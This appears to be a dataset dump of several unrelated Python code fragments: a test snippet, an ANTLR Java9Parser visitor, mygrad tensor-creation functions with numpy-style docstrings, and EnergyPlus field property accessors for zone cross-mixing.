dataset.X_test[0, 0, 1], torch.tensor(-1.8091), rtol=RTOL, atol=ATOL
)
def test_reproducibility_2(self):
| |
tree produced by Java9Parser#simpleTypeName.
def visitSimpleTypeName(self, ctx:Java9Parser.SimpleTypeNameContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#constructorBody.
def visitConstructorBody(self, ctx:Java9Parser.ConstructorBodyContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#explicitConstructorInvocation.
def visitExplicitConstructorInvocation(self, ctx:Java9Parser.ExplicitConstructorInvocationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumDeclaration.
def visitEnumDeclaration(self, ctx:Java9Parser.EnumDeclarationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumBody.
def visitEnumBody(self, ctx:Java9Parser.EnumBodyContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumConstantList.
def visitEnumConstantList(self, ctx:Java9Parser.EnumConstantListContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumConstant.
def visitEnumConstant(self, ctx:Java9Parser.EnumConstantContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumConstantModifier.
def visitEnumConstantModifier(self, ctx:Java9Parser.EnumConstantModifierContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumBodyDeclarations.
def visitEnumBodyDeclarations(self, ctx:Java9Parser.EnumBodyDeclarationsContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceDeclaration.
def visitInterfaceDeclaration(self, ctx:Java9Parser.InterfaceDeclarationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#normalInterfaceDeclaration.
def visitNormalInterfaceDeclaration(self, ctx:Java9Parser.NormalInterfaceDeclarationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceModifier.
def visitInterfaceModifier(self, ctx:Java9Parser.InterfaceModifierContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#extendsInterfaces.
def visitExtendsInterfaces(self, ctx:Java9Parser.ExtendsInterfacesContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceBody.
def visitInterfaceBody(self, ctx:Java9Parser.InterfaceBodyContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceMemberDeclaration.
def visitInterfaceMemberDeclaration(self, ctx:Java9Parser.InterfaceMemberDeclarationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#constantDeclaration.
def visitConstantDeclaration(self, ctx:Java9Parser.ConstantDeclarationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#constantModifier.
def visitConstantModifier(self, ctx:Java9Parser.ConstantModifierContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceMethodDeclaration.
def visitInterfaceMethodDeclaration(self, ctx:Java9Parser.InterfaceMethodDeclarationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceMethodModifier.
def visitInterfaceMethodModifier(self, ctx:Java9Parser.InterfaceMethodModifierContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotationTypeDeclaration.
def visitAnnotationTypeDeclaration(self, ctx:Java9Parser.AnnotationTypeDeclarationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotationTypeBody.
def visitAnnotationTypeBody(self, ctx:Java9Parser.AnnotationTypeBodyContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotationTypeMemberDeclaration.
def visitAnnotationTypeMemberDeclaration(self, ctx:Java9Parser.AnnotationTypeMemberDeclarationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotationTypeElementDeclaration.
def visitAnnotationTypeElementDeclaration(self, ctx:Java9Parser.AnnotationTypeElementDeclarationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotationTypeElementModifier.
def visitAnnotationTypeElementModifier(self, ctx:Java9Parser.AnnotationTypeElementModifierContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#defaultValue.
def visitDefaultValue(self, ctx:Java9Parser.DefaultValueContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotation.
def visitAnnotation(self, ctx:Java9Parser.AnnotationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#normalAnnotation.
def visitNormalAnnotation(self, ctx:Java9Parser.NormalAnnotationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#elementValuePairList.
def visitElementValuePairList(self, ctx:Java9Parser.ElementValuePairListContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#elementValuePair.
def visitElementValuePair(self, ctx:Java9Parser.ElementValuePairContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#elementValue.
def visitElementValue(self, ctx:Java9Parser.ElementValueContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#elementValueArrayInitializer.
def visitElementValueArrayInitializer(self, ctx:Java9Parser.ElementValueArrayInitializerContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#elementValueList.
def visitElementValueList(self, ctx:Java9Parser.ElementValueListContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#markerAnnotation.
def visitMarkerAnnotation(self, ctx:Java9Parser.MarkerAnnotationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#singleElementAnnotation.
def visitSingleElementAnnotation(self, ctx:Java9Parser.SingleElementAnnotationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#arrayInitializer.
def visitArrayInitializer(self, ctx:Java9Parser.ArrayInitializerContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#variableInitializerList.
def visitVariableInitializerList(self, ctx:Java9Parser.VariableInitializerListContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#block.
def visitBlock(self, ctx:Java9Parser.BlockContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#blockStatements.
def visitBlockStatements(self, ctx:Java9Parser.BlockStatementsContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#blockStatement.
def visitBlockStatement(self, ctx:Java9Parser.BlockStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#localVariableDeclarationStatement.
def visitLocalVariableDeclarationStatement(self, ctx:Java9Parser.LocalVariableDeclarationStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#localVariableDeclaration.
def visitLocalVariableDeclaration(self, ctx:Java9Parser.LocalVariableDeclarationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#statement.
def visitStatement(self, ctx:Java9Parser.StatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#statementNoShortIf.
def visitStatementNoShortIf(self, ctx:Java9Parser.StatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#statementWithoutTrailingSubstatement.
def visitStatementWithoutTrailingSubstatement(self, ctx:Java9Parser.StatementWithoutTrailingSubstatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#emptyStatement.
def visitEmptyStatement(self, ctx:Java9Parser.EmptyStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#labeledStatement.
def visitLabeledStatement(self, ctx:Java9Parser.LabeledStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#labeledStatementNoShortIf.
def visitLabeledStatementNoShortIf(self, ctx:Java9Parser.LabeledStatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#expressionStatement.
def visitExpressionStatement(self, ctx:Java9Parser.ExpressionStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#statementExpression.
def visitStatementExpression(self, ctx:Java9Parser.StatementExpressionContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#ifThenStatement.
def visitIfThenStatement(self, ctx:Java9Parser.IfThenStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#ifThenElseStatement.
def visitIfThenElseStatement(self, ctx:Java9Parser.IfThenElseStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#ifThenElseStatementNoShortIf.
def visitIfThenElseStatementNoShortIf(self, ctx:Java9Parser.IfThenElseStatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#assertStatement.
def visitAssertStatement(self, ctx:Java9Parser.AssertStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#switchStatement.
def visitSwitchStatement(self, ctx:Java9Parser.SwitchStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#switchBlock.
def visitSwitchBlock(self, ctx:Java9Parser.SwitchBlockContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#switchBlockStatementGroup.
def visitSwitchBlockStatementGroup(self, ctx:Java9Parser.SwitchBlockStatementGroupContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#switchLabels.
def visitSwitchLabels(self, ctx:Java9Parser.SwitchLabelsContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#switchLabel.
def visitSwitchLabel(self, ctx:Java9Parser.SwitchLabelContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumConstantName.
def visitEnumConstantName(self, ctx:Java9Parser.EnumConstantNameContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#whileStatement.
def visitWhileStatement(self, ctx:Java9Parser.WhileStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#whileStatementNoShortIf.
def visitWhileStatementNoShortIf(self, ctx:Java9Parser.WhileStatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#doStatement.
def visitDoStatement(self, ctx:Java9Parser.DoStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#forStatement.
def visitForStatement(self, ctx:Java9Parser.ForStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#forStatementNoShortIf.
def visitForStatementNoShortIf(self, ctx:Java9Parser.ForStatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#basicForStatement.
def visitBasicForStatement(self, ctx:Java9Parser.BasicForStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#basicForStatementNoShortIf.
def visitBasicForStatementNoShortIf(self, ctx:Java9Parser.BasicForStatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#forInit.
def visitForInit(self, ctx:Java9Parser.ForInitContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#forUpdate.
def visitForUpdate(self, ctx:Java9Parser.ForUpdateContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#statementExpressionList.
def visitStatementExpressionList(self, ctx:Java9Parser.StatementExpressionListContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enhancedForStatement.
def visitEnhancedForStatement(self, ctx:Java9Parser.EnhancedForStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enhancedForStatementNoShortIf.
def visitEnhancedForStatementNoShortIf(self, ctx:Java9Parser.EnhancedForStatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#breakStatement.
def visitBreakStatement(self, ctx:Java9Parser.BreakStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#continueStatement.
def visitContinueStatement(self, ctx:Java9Parser.ContinueStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#returnStatement.
def visitReturnStatement(self, ctx:Java9Parser.ReturnStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#throwStatement.
def visitThrowStatement(self, ctx:Java9Parser.ThrowStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#synchronizedStatement.
def visitSynchronizedStatement(self, ctx:Java9Parser.SynchronizedStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#tryStatement.
def visitTryStatement(self, ctx:Java9Parser.TryStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#catches.
def visitCatches(self, ctx:Java9Parser.CatchesContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#catchClause.
def visitCatchClause(self, ctx:Java9Parser.CatchClauseContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#catchFormalParameter.
def visitCatchFormalParameter(self, ctx:Java9Parser.CatchFormalParameterContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#catchType.
def visitCatchType(self, ctx:Java9Parser.CatchTypeContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#finally_.
def visitFinally_(self, ctx:Java9Parser.Finally_Context):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#tryWithResourcesStatement.
def visitTryWithResourcesStatement(self, ctx:Java9Parser.TryWithResourcesStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#resourceSpecification.
def visitResourceSpecification(self, ctx:Java9Parser.ResourceSpecificationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#resourceList.
def visitResourceList(self, ctx:Java9Parser.ResourceListContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#resource.
def visitResource(self, ctx:Java9Parser.ResourceContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#variableAccess.
def visitVariableAccess(self, ctx:Java9Parser.VariableAccessContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primary.
def visitPrimary(self, ctx:Java9Parser.PrimaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray.
def visitPrimaryNoNewArray(self, ctx:Java9Parser.PrimaryNoNewArrayContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lf_arrayAccess.
def visitPrimaryNoNewArray_lf_arrayAccess(self, ctx:Java9Parser.PrimaryNoNewArray_lf_arrayAccessContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lfno_arrayAccess.
def visitPrimaryNoNewArray_lfno_arrayAccess(self, ctx:Java9Parser.PrimaryNoNewArray_lfno_arrayAccessContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lf_primary.
def visitPrimaryNoNewArray_lf_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lf_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lf_primary_lf_arrayAccess_lf_primary.
def visitPrimaryNoNewArray_lf_primary_lf_arrayAccess_lf_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lf_primary_lf_arrayAccess_lf_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lf_primary_lfno_arrayAccess_lf_primary.
def visitPrimaryNoNewArray_lf_primary_lfno_arrayAccess_lf_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lf_primary_lfno_arrayAccess_lf_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lfno_primary.
def visitPrimaryNoNewArray_lfno_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lfno_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lfno_primary_lf_arrayAccess_lfno_primary.
def visitPrimaryNoNewArray_lfno_primary_lf_arrayAccess_lfno_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lfno_primary_lf_arrayAccess_lfno_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lfno_primary_lfno_arrayAccess_lfno_primary.
def visitPrimaryNoNewArray_lfno_primary_lfno_arrayAccess_lfno_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lfno_primary_lfno_arrayAccess_lfno_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#classLiteral.
def visitClassLiteral(self, ctx:Java9Parser.ClassLiteralContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#classInstanceCreationExpression.
def visitClassInstanceCreationExpression(self, | |
from typing import Optional, Sequence, Union
import numpy as np
from mygrad.tensor_base import Tensor, _resolve_constant, implements_numpy_override
from mygrad.typing import ArrayLike, DTypeLikeReals, Real
Shape = Union[Sequence[int], int]
def _anything_but_tensor(x):
if isinstance(x, Tensor):
x = x.data
return x
__all__ = [
"arange",
"empty",
"empty_like",
"eye",
"geomspace",
"identity",
"linspace",
"logspace",
"ones",
"ones_like",
"full",
"full_like",
"zeros",
"zeros_like",
]
def empty(
shape: Shape, dtype: DTypeLikeReals = np.float32, *, constant: Optional[bool] = None
) -> Tensor:
"""Return a new Tensor of the given shape and type, without initializing entries.
This docstring was adapted from ``numpy.empty`` [1]_
Parameters
----------
shape : Union[int, Tuple[int]]
The shape of the empty array.
dtype : data-type, optional (default=numpy.float32)
The data type of the output Tensor.
constant : Optional[bool]
If ``True``, this tensor is a constant, and thus does not facilitate
back propagation.
Defaults to ``False`` for float-type data.
Defaults to ``True`` for integer-type data.
Integer-type tensors must be constant.
Returns
-------
Tensor
A tensor of uninitialized data of the given shape and dtype.
References
----------
.. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.empty.html
See Also
--------
empty_like : Return an empty tensor with shape and type of input.
ones : Return a new tensor setting values to one.
zeros : Return a new tensor setting values to zero.
full : Return a new tensor of given shape filled with value.
Notes
-----
`empty`, unlike `zeros`, does not set the array values to zero,
and may therefore be marginally faster. On the other hand, it requires
the user to manually set all the values in the array, and should be
used with caution.
Examples
--------
>>> import mygrad as mg
>>> mg.empty([2, 2], constant=True)
Tensor([[ -9.74499359e+001, 6.69583040e-309],
[ 2.13182611e-314, 3.06959433e-309]]) #random
>>> mg.empty([2, 2], dtype=int)
Tensor([[-1073741821, -1067949133],
[ 496041986, 19249760]]) #random
"""
return Tensor(np.empty(shape=shape, dtype=dtype), constant=constant, copy=False)
@implements_numpy_override()
def empty_like(
other: ArrayLike,
dtype: Optional[DTypeLikeReals] = None,
shape: Optional[Union[int, Sequence[int]]] = None,
*,
constant: Optional[bool] = None,
) -> Tensor:
"""Return a new Tensor of the same shape and type as the given array.
This docstring was adapted from ``numpy.empty_like`` [1]_
Parameters
----------
other : ArrayLike
The Tensor or array whose shape and datatype should be mirrored.
dtype : Optional[DTypeLikeReals]
Override the data type of the returned Tensor with this value, or None to not override.
shape : Optional[Union[int, Sequence[int]]]
If specified, overrides the shape of the result
constant : Optional[bool]
If ``True``, this tensor is a constant, and thus does not facilitate
back propagation. If ``None`` then:
Inferred from ``other``, if other is a tensor
Defaults to ``False`` for float-type data.
Defaults to ``True`` for integer-type data.
Returns
-------
Tensor
A tensor of uninitialized data whose shape and type match `other`.
References
----------
.. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.empty_like.html
See Also
--------
empty : Return a new Tensor of the given shape and type, without initializing entries.
ones : Return a new tensor setting values to one.
zeros : Return a new tensor setting values to zero.
full : Return a new tensor of given shape filled with value.
Examples
--------
>>> import mygrad as mg
>>> x = mg.arange(4).reshape(2, 2)
>>> mg.empty_like(x, constant=True)
Tensor([[ -9.74499359e+001, 6.69583040e-309],
[ 2.13182611e-314, 3.06959433e-309]]) #random
>>> mg.empty_like(x, dtype=int)
Tensor([[-1073741821, -1067949133],
[ 496041986, 19249760]]) #random
"""
constant = _resolve_constant(other, constant=constant)
return Tensor(
np.empty_like(_anything_but_tensor(other), dtype=dtype, shape=shape),
constant=constant,
copy=False,
)
def eye(
N: int,
M: Optional[int] = None,
k: int = 0,
dtype: DTypeLikeReals = float,
*,
constant: Optional[bool] = None,
) -> Tensor:
"""Return a 2D Tensor with ones on the diagonal and zeros elsewhere.
This docstring was adapted from ``numpy.eye`` [1]_
Parameters
----------
N : int
The number of rows in the output Tensor.
M : int, optional (default=None)
The number of columns in the output, or None to match `rows`.
k : int, optional (default=0)
The index of the diagonal. 0 is the main diagonal; a positive value is the upper
diagonal, while a negative value refers to the lower diagonal.
dtype : data-type, optional (default=numpy.float32)
The data type of the output Tensor.
constant : Optional[bool]
If ``True``, this tensor is a constant, and thus does not facilitate
back propagation.
Defaults to ``False`` for float-type data.
Defaults to ``True`` for integer-type data.
Integer-type tensors must be constant.
References
----------
.. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.eye.html
Returns
-------
Tensor
A tensor whose elements are 0, except for the :math:`k`-th diagonal, whose values are 1.
Examples
--------
>>> import mygrad as mg
>>> mg.eye(2, dtype=int)
Tensor([[1, 0],
[0, 1]])
>>> mg.eye(3, k=1)
Tensor([[ 0., 1., 0.],
[ 0., 0., 1.],
[ 0., 0., 0.]])
"""
return Tensor(
np.eye(N, M=M, k=k, dtype=dtype),
constant=constant,
copy=False,
)
def identity(
n: int, dtype: DTypeLikeReals = float, *, constant: Optional[bool] = None
) -> Tensor:
"""Return the identity Tensor; a square Tensor with 1s on the main diagonal and 0s elsewhere.
This docstring was adapted from ``numpy.identity`` [1]_
Parameters
----------
n : int
The number of rows and columns in the output Tensor.
dtype : data-type, optional (default=numpy.float32)
The data type of the output Tensor.
constant : Optional[bool]
If ``True``, this tensor is a constant, and thus does not facilitate
back propagation.
Defaults to ``False`` for float-type data.
Defaults to ``True`` for integer-type data.
Integer-type tensors must be constant.
Returns
-------
Tensor
A square Tensor whose main diagonal is 1 and all other elements are 0.
References
----------
.. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.identity.html
Examples
--------
>>> import mygrad as mg
>>> mg.identity(3)
Tensor([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
"""
return Tensor(np.identity(n, dtype=dtype), constant=constant, copy=False)
def ones(
shape: Shape, dtype: DTypeLikeReals = np.float32, *, constant: Optional[bool] = None
) -> Tensor:
"""
Return a Tensor of the given shape and type, filled with ones.
This docstring was adapted from ``numpy.ones`` [1]_
Parameters
----------
shape : Union[int, Tuple[int]]
The shape of the output Tensor.
dtype : data-type, optional (default=numpy.float32)
The data type of the output Tensor.
constant : Optional[bool]
If ``True``, this tensor is a constant, and thus does not facilitate
back propagation.
Defaults to ``False`` for float-type data.
Defaults to ``True`` for integer-type data.
Integer-type tensors must be constant.
Returns
-------
Tensor
A Tensor of ones with the given shape and data type.
References
----------
.. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.ones.html
See Also
--------
ones_like : Return an tensor of ones with shape and type of input.
empty : Return a new uninitialized tensor.
zeros : Return a new tensor setting values to zero.
full : Return a new tensor of given shape filled with value.
Examples
--------
>>> import mygrad as mg
>>> mg.ones(5)
Tensor([ 1., 1., 1., 1., 1.])
>>> mg.ones((5,), dtype=int)
Tensor([1, 1, 1, 1, 1])
>>> mg.ones((2, 1))
Tensor([[ 1.],
[ 1.]])
>>> mg.ones((2, 2))
Tensor([[ 1., 1.],
[ 1., 1.]])
"""
return Tensor(np.ones(shape, dtype=dtype), constant=constant, copy=False)
@implements_numpy_override()
def ones_like(
other: ArrayLike,
dtype: Optional[DTypeLikeReals] = None,
shape: Optional[Union[int, Sequence[int]]] = None,
*,
constant: Optional[bool] = None,
) -> Tensor:
"""
Return a Tensor of the same shape and type as the given, filled with ones.
This docstring was adapted from ``numpy.ones_like`` [1]_
Parameters
----------
other : array_like
The Tensor or array whose shape and datatype should be mirrored.
dtype : Optional[DTypeLikeReals]
Override the data type of the returned Tensor with this value, or None to not override.
shape : Optional[Union[int, Sequence[int]]]
If specified, overrides the shape of the result
constant : Optional[bool]
If ``True``, this tensor is a constant, and thus does not facilitate
back propagation. If ``None`` then:
Inferred from ``other``, if other is a tensor
Defaults to ``False`` for float-type data.
Defaults to ``True`` for integer-type data.
Returns
-------
Tensor
A Tensor of ones whose shape and data type match `other`.
References
----------
.. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.ones_like.html
Examples
--------
>>> import mygrad as mg
>>> x = mg.arange(6).reshape((2, 3))
>>> x
Tensor([[0, 1, 2],
[3, 4, 5]])
>>> mg.ones_like(x)
Tensor([[1, 1, 1],
[1, 1, 1]])
>>> y = mg.arange(3, dtype=float)
>>> y
Tensor([ 0., 1., 2.])
>>> mg.ones_like(y)
| |
`value` is not a valid value
Returns:
float: the value of `flow_rate_per_zone_floor_area` or None if not set
"""
return self["Flow Rate per Zone Floor Area"]
@flow_rate_per_zone_floor_area.setter
def flow_rate_per_zone_floor_area(self, value=None):
"""Corresponds to IDD field `Flow Rate per Zone Floor Area`"""
self["Flow Rate per Zone Floor Area"] = value
@property
def flow_rate_per_person(self):
"""field `Flow Rate per Person`
| Units: m3/s-person
Args:
value (float): value for IDD Field `Flow Rate per Person`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `flow_rate_per_person` or None if not set
"""
return self["Flow Rate per Person"]
@flow_rate_per_person.setter
def flow_rate_per_person(self, value=None):
"""Corresponds to IDD field `Flow Rate per Person`"""
self["Flow Rate per Person"] = value
@property
def air_changes_per_hour(self):
"""field `Air Changes per Hour`
| Units: 1/hr
Args:
value (float): value for IDD Field `Air Changes per Hour`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `air_changes_per_hour` or None if not set
"""
return self["Air Changes per Hour"]
@air_changes_per_hour.setter
def air_changes_per_hour(self, value=None):
"""Corresponds to IDD field `Air Changes per Hour`"""
self["Air Changes per Hour"] = value
@property
def source_zone_name(self):
"""field `Source Zone Name`
Args:
value (str): value for IDD Field `Source Zone Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `source_zone_name` or None if not set
"""
return self["Source Zone Name"]
@source_zone_name.setter
def source_zone_name(self, value=None):
"""Corresponds to IDD field `Source Zone Name`"""
self["Source Zone Name"] = value
@property
def delta_temperature(self):
"""field `Delta Temperature`
| This field contains the constant temperature differential between source and
| receiving zones below which cross mixing is shutoff. This value must be greater
| than or equal to zero.
| Units: deltaC
Args:
value (float): value for IDD Field `Delta Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `delta_temperature` or None if not set
"""
return self["Delta Temperature"]
@delta_temperature.setter
def delta_temperature(self, value=None):
"""Corresponds to IDD field `Delta Temperature`"""
self["Delta Temperature"] = value
@property
def delta_temperature_schedule_name(self):
"""field `Delta Temperature Schedule Name`
| This schedule contains the temperature differential between source and receiving
| zones versus time below which cross mixing is shutoff.
Args:
value (str): value for IDD Field `Delta Temperature Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `delta_temperature_schedule_name` or None if not set
"""
return self["Delta Temperature Schedule Name"]
@delta_temperature_schedule_name.setter
def delta_temperature_schedule_name(self, value=None):
"""Corresponds to IDD field `Delta Temperature Schedule Name`"""
self["Delta Temperature Schedule Name"] = value
@property
def minimum_zone_temperature_schedule_name(self):
"""field `Minimum Zone Temperature Schedule Name`
| This schedule contains the indoor temperature versus time below which
| cross mixing is shutoff.
Args:
value (str): value for IDD Field `Minimum Zone Temperature Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `minimum_zone_temperature_schedule_name` or None if not set
"""
return self["Minimum Zone Temperature Schedule Name"]
@minimum_zone_temperature_schedule_name.setter
def minimum_zone_temperature_schedule_name(self, value=None):
"""Corresponds to IDD field `Minimum Zone Temperature Schedule Name`"""
self["Minimum Zone Temperature Schedule Name"] = value
@property
def maximum_zone_temperature_schedule_name(self):
"""field `Maximum Zone Temperature Schedule Name`
| This schedule contains the indoor temperature versus time above which
| cross mixing is shutoff.
Args:
value (str): value for IDD Field `Maximum Zone Temperature Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `maximum_zone_temperature_schedule_name` or None if not set
"""
return self["Maximum Zone Temperature Schedule Name"]
@maximum_zone_temperature_schedule_name.setter
def maximum_zone_temperature_schedule_name(self, value=None):
"""Corresponds to IDD field `Maximum Zone Temperature Schedule Name`"""
self["Maximum Zone Temperature Schedule Name"] = value
@property
def minimum_source_zone_temperature_schedule_name(self):
"""field `Minimum Source Zone Temperature Schedule Name`
| This schedule contains the source zone dry-bulb temperature versus time below
| which cross mixing is shutoff.
Args:
value (str): value for IDD Field `Minimum Source Zone Temperature Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `minimum_source_zone_temperature_schedule_name` or None if not set
"""
return self["Minimum Source Zone Temperature Schedule Name"]
@minimum_source_zone_temperature_schedule_name.setter
def minimum_source_zone_temperature_schedule_name(self, value=None):
"""Corresponds to IDD field `Minimum Source Zone Temperature Schedule
Name`"""
self["Minimum Source Zone Temperature Schedule Name"] = value
@property
def maximum_source_zone_temperature_schedule_name(self):
"""field `Maximum Source Zone Temperature Schedule Name`
| This schedule contains the source zone dry-bulb temperature versus time above
| which cross mixing is shutoff.
Args:
value (str): value for IDD Field `Maximum Source Zone Temperature Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `maximum_source_zone_temperature_schedule_name` or None if not set
"""
return self["Maximum Source Zone Temperature Schedule Name"]
@maximum_source_zone_temperature_schedule_name.setter
def maximum_source_zone_temperature_schedule_name(self, value=None):
"""Corresponds to IDD field `Maximum Source Zone Temperature Schedule
Name`"""
self["Maximum Source Zone Temperature Schedule Name"] = value
@property
def minimum_outdoor_temperature_schedule_name(self):
